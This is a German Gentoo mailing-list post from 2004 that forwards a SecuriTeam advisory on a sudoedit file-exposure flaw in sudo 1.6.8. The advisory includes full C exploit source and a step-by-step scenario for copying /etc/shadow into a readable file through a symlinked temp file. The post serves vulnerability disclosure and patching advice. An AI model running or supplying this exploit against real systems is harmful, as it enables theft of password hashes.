1 |
Christoph Probst wrote: |
2 |
> Hallo. |
3 |
> |
4 |
> Dominik Elsbroek schrieb am 05.10.2004 um 14:53 Uhr: |
5 |
> |
6 |
> |
7 |
>>ich habe ein mehr oder minder schweres Problem mit sudo. Mit der Option |
8 |
>>-u ist es einem Angreifer möglich den mit dem sudo Befehl Dateien zu |
9 |
>>lesen auf jene er eigentlich keinen Zugriff haben sollte. |
10 |
> |
11 |
> |
12 |
> Das ist doch genau der Zweck von sudo. Was wurde diesem Benutzer denn in der |
13 |
> /etc/sudoers (benutze visudo zum bearbeiten) erlaubt? Wenn dort nichts |
14 |
> aktiviert ist (also alles ein "#" davor hat), dann ist es eventuell wirklich |
15 |
> ein Bug. Ansonsten tippe ich erstmal auf Konfigurationsfehler. |
16 |
> |
17 |
> Es gibt zwar ein aktuelles Sicherheitsproblem bei sudo, aber das ist mehr |
18 |
> theoretisch: http://www.sudo.ws/sudo/alerts/sudoedit.html |
19 |
> |
20 |
> Im Changelog ab Version 1.6.7p5 kann ich ansonsten nichts verdaechtiges |
21 |
> finden. Allerdings schon richtig: Ein Update auf 1.6.8p1 waere mal Zeit. |
22 |
> |
23 |
> |
24 |
> Chris |
25 |
> |
26 |
|
27 |
Hm... also wenn es ein config Fehler gewesen wäre haette ich nicht |
28 |
gesagt: es gibt ein Bug... sogar zwei |
29 |
|
30 |
folgende Meldung bekam ich per mail: |
31 |
|
32 |
The following security advisory is sent to the securiteam mailing list, |
33 |
and can be found at the SecuriTeam web site: http://www.securiteam.com |
34 |
- - promotion |
35 |
|
36 |
The SecuriTeam alerts list - Free, Accurate, Independent. |
37 |
|
38 |
Get your security news from a reliable source. |
39 |
http://www.securiteam.com/mailinglist.html |
40 |
|
41 |
- - - - - - - - - |
42 |
|
43 |
|
44 |
|
45 |
Sudo -u Parameter File Exposure |
46 |
------------------------------------------------------------------------ |
47 |
|
48 |
|
49 |
SUMMARY |
50 |
|
51 |
<http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system |
52 |
administrator to give certain users (or groups of users) the ability to |
53 |
run some (or all) commands as root or another user while logging the |
54 |
commands and arguments. |
55 |
|
56 |
A flaw in exists in sudo's -u option (aka sudoedit) that can give an |
57 |
attacker read permission to a file that would otherwise be unreadable. |
58 |
|
59 |
DETAILS |
60 |
|
61 |
Vulnerable Systems: |
62 |
* sudo 1.6.8 and prior |
63 |
|
64 |
Immune Systems: |
65 |
* sudo version 1.6.8p1 and newer |
66 |
|
67 |
While sudoedit runs the actual editor as the invoking user, the temporary |
68 |
file is then re-opened with root privileges. An attacker can run sudoedit, |
69 |
remove the editor temporary file, make a link to an unreadable file with |
70 |
the same name as the old temporary file and quit the editor. The file |
71 |
being edited via sudoedit will now contain a copy of the previously |
72 |
unreadable file. |
73 |
|
74 |
Impact: |
75 |
Exploitation of the bug requires that the sudoers file be configured to |
76 |
allow the attacker to run sudoedit. If no users have been granted access |
77 |
to sudoedit there is no impact. |
78 |
|
79 |
Fix: |
80 |
The bug is fixed in sudo 1.6.8p1. |
81 |
|
82 |
Exploit: |
83 |
/* |
84 |
|
85 |
Copyright Rosiello Security 2004 |
86 |
http://www.rosiello.org |
87 |
|
88 |
sudoedit Exploit |
89 |
|
90 |
|
91 |
SOFTWARE : sudoedit |
92 |
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html |
93 |
DATE: 18/09/2004 |
94 |
|
95 |
Summary: |
96 |
A flaw in exists in sudo's -u option (aka sudoedit) |
97 |
in sudo version 1.6.8 that can give an attacker |
98 |
read permission to a file that would otherwise be |
99 |
unreadable. |
100 |
|
101 |
Sudo versions affected: |
102 |
1.6.8 only |
103 |
|
104 |
Credit: |
105 |
Reznic Valery discovered the problem. |
106 |
|
107 |
----------------------------------------------------------- |
108 |
|
109 |
All the information that you can find in this software |
110 |
were published for educational and didactic purpose only. |
111 |
The author published this program under the condition |
112 |
that is not in the intention of the reader to use them |
113 |
in order to bring to himself or others a profit or to bring |
114 |
to others damage. |
115 |
|
116 |
!Respect the law! |
117 |
|
118 |
How do I use this code ? |
119 |
|
120 |
To exploit sudoedit you have to open with it the |
121 |
file "rosiello" as shown in the example. |
122 |
|
123 |
EXAMPLE SCENARIO: |
124 |
|
125 |
1) Open two shells (i) and (ii); |
126 |
2) (i)$sudoedit rosiello; |
127 |
3) (ii)$./sudoedit-exploit /etc/shadow; |
128 |
4) (i) close sudoedit. |
129 |
|
130 |
The file "rosiello" is now a copy of "/etc/shadow". |
131 |
|
132 |
AUTHOR : Angelo Rosiello |
133 |
CONTACT: angelo@××××××××.org |
134 |
|
135 |
*/ |
136 |
|
137 |
#include <stdio.h> |
138 |
#include <sys/stat.h> |
139 |
#include <string.h> |
140 |
#include <sys/types.h> |
141 |
#include <fcntl.h> |
142 |
#include <dirent.h> |
143 |
|
144 |
|
145 |
int main( int argc, char *argv[] ) |
146 |
{ |
147 |
char PATH[]="/usr/tmp"; |
148 |
char file[32]; |
149 |
DIR *tmp; |
150 |
struct dirent *de; |
151 |
int found = 0; |
152 |
|
153 |
printf( "Copyright Rosiello Security 2004\n" ); |
154 |
printf( "http://www.rosiello.org\n" ); |
155 |
|
156 |
if( argc!=2 ) |
157 |
{ |
158 |
printf( "USAGE: %s file\n", argv[0] ); |
159 |
return( -1 ); |
160 |
} |
161 |
|
162 |
|
163 |
tmp = opendir ( PATH ); |
164 |
while ( !found && (de = readdir ( tmp ))!= NULL ) |
165 |
{ |
166 |
if ( (strstr(de->d_name, "rosiello") != NULL) ) |
167 |
{ |
168 |
if( strlen(de->d_name) > 22 ) return( -1 ); |
169 |
sprintf( file, "%s/%s", PATH, (char *)de->d_name ); |
170 |
remove( file ); |
171 |
if( fork()!=0 ) |
172 |
{ |
173 |
execl( "/bin/ln", "ln", "-s", argv[1], file, NULL ); |
174 |
} |
175 |
wait( ); |
176 |
printf( "Now you can close sudoedit and reopen rosiello!\n" ); |
177 |
found=1; |
178 |
|
179 |
} |
180 |
|
181 |
} |
182 |
closedir( tmp ); |
183 |
|
184 |
if( !found ) |
185 |
printf( "File Not Found!\n" ); |
186 |
return( 0 ); |
187 |
|
188 |
} |
189 |
|
190 |
Gruß Dominik |
191 |
|
192 |
-- |
193 |
gentoo-user-de@g.o mailing list |